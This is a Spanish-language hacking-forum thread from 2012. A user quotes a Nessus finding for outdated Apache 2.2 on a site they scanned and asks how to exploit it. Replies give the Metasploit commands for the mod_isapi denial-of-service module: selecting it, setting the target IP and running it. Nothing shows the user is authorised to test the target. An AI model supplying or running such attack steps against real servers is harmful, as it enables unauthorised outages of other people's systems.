[SOLUCIONADO] Ayuda con vulnerabilidad

Iniciado por BCKTR1X, Diciembre 09, 2012, 10:47:26 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Diciembre 09, 2012, 10:47:26 PM Ultima modificación: Septiembre 26, 2014, 09:34:45 PM por Expermicid
analize una pagina con nessus y me tiro una vulnerabilidad critica (Apache 2.2 < 2.2.15 Multiple Vulnerabilities) y esto me sale en la descripcion

According to its banner, the version of Apache 2.2 installed on the remote host is older than 2.2.15. Such versions are potentially affected by multiple vulnerabilities :

- A TLS renegotiation prefix injection attack is possible. (CVE-2009-3555)

- The 'mod_proxy_ajp' module returns the wrong status code if it encounters an error which causes the back-end server to be put into an error state. (CVE-2010-0408)

- The 'mod_isapi' attempts to unload the 'ISAPI.dll' when it encounters various error states which could leave call-backs in an undefined state. (CVE-2010-0425)

- A flaw in the core sub-request process code can lead to sensitive information from a request being handled by the wrong thread if a multi-threaded environment is used. (CVE-2010-0434)

- Added 'mod_reqtimeout' module to mitigate Slowloris attacks. (CVE-2007-6750)

y esto en la informacion de la vulnerabilidad :

CPE:
cpe:/a:apache:http_server
Exploit Available:
true
Exploitability Ease:
Exploits are available
Patch Publication Date:
2010/03/08
Vulnerability Publication Date:
2010/03/03
Exploitable With:

    Metasploit (Apache mod_isapi <= 2.2.14 Dangling Pointer)
    Core Impact
mi pregunta es de como explotar esa vulnerabilidad  :-[

use auxiliary/dos/http/apache_mod_isapi

Luego.

set RHOST ( Target IP )

run
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

jejeje disculpa mi ignorancia pero que se puede hacer con esa vulnerabilidad  :-[

Una denegación de servicio, usando msf (metasploit framework).

Saludos,

 ;D jajaja ok gracias por la aclaracion


Por favor lee las instrucciones de uso del exploit en cuestión. Cuando tengas errores-problemas, lo primero que tienes que hacer es investigar, si no encuentras una solución puedes realizar consultas concretas para que la comunidad te pueda ayudar.

Saludos,

ok ok buscare  :D gracias por la ayuda.

luego de hacer el USE del exploit prueba poniendo show options para ver q datos tienens q mandarle ;) saludos
<h1>PerverthsO</h1>